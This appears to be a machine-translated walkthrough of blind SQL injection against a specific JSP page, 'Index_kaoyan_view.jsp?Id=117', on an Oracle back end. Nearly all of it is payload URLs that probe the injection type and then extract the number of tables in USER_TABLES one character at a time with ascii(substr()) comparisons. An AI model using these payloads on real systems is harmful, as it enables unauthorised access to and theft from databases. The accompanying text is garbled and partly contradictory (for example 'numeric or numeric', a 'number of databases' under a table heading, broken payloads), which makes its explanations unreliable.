1. Determine the injection type (numeric or numeric)
Typical and digital data judgment: (I hope someone can further refine the judgment, which is divided into two parts: digital and numeric)
/Index_kaoyan_view.jsp? Id = 117 And user> char (0)
/Index_kaoyan_view.jsp? Id = 117 And user
/Index_kaoyan_view.jsp? Id = 117 And user> char (0) And 1 = 1
/Index_kaoyan_view.jsp? Id = 117 And userchar (0) And % 25 =
/Index_kaoyan_view.jsp? Id = 117 And userchar (0) And () = (
/Index_kaoyan_view.jsp? (Id = 117) And user/index_kaoyan_view.jsp? Id = 117 And str (98)> str (97)
/Index_kaoyan_view.jsp? Id = 117 And str (98)
/Index_kaoyan_view.jsp? Id = 117 And str (98)> str (97) And 1 = 1
/Index_kaoyan_view.jsp? Id = 117 And str (98) str (97) And % 25 =
/Index_kaoyan_view.jsp? Id = 117 And user
/Index_kaoyan_view.jsp? Id = 117 And str (98) str (97) And () = (
/Index_kaoyan_view.jsp? Id = 117 () And str (98)
A normal page appears:
/Index_kaoyan_view.jsp? Id = 117 And USER> CHR (0)
/Index_kaoyan_view.jsp? Id = 117 And USER
2. Number of tables to be guessed and table name
The number of databases is 3:
/Index_kaoyan_view.jsp? Id = 117 ">
/Index_kaoyan_view.jsp? Id = 117 And 0 <= nvl (length (select count (*) FROM USER_TABLES), 0)
/Index_kaoyan_view.jsp? Id = 117 And 1> = nvl (length (select count (*) FROM USER_TABLES), 0)
/Index_kaoyan_view.jsp? Id = 117 And 2 <= nvl (length (select count (*) FROM USER_TABLES), 0)
/Index_kaoyan_view.jsp? Id = 117 And 4> = nvl (length (select count (*) FROM USER_TABLES), 0)
/Index_kaoyan_view.jsp? And id = 117
3 = nvl (length (select count (*) FROM USER_TABLES), 0)
/Index_kaoyan_view.jsp? Id = 117 And UNISTR (1)> UNISTR (0)
Number of data tables to be guessed
Data table first: 1
/Index_kaoyan_view.jsp? Id = 117 And 52 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 52> ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 49 = ascii (substr (select count (*) FROM USER_TABLES ))
The second digit of the data table is 3.
/Index_kaoyan_view.jsp? Id = 117 And 49 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 95 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 77 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 77> ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 70 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 70> ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 67 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 67> ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 65 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 65> ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 109 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 109> ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 102 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 102> ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 99 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 99> ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 97 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 97> ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 53 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 53> ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 51 = ascii (substr (select count (*) FROM USER_TABLES ))
The third digit of the data table is: 1.
/Index_kaoyan_view.jsp? Id = 117 And 51 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 95 = ascii (substr (select count (*) FROM USER_TABLES), 3,1 ))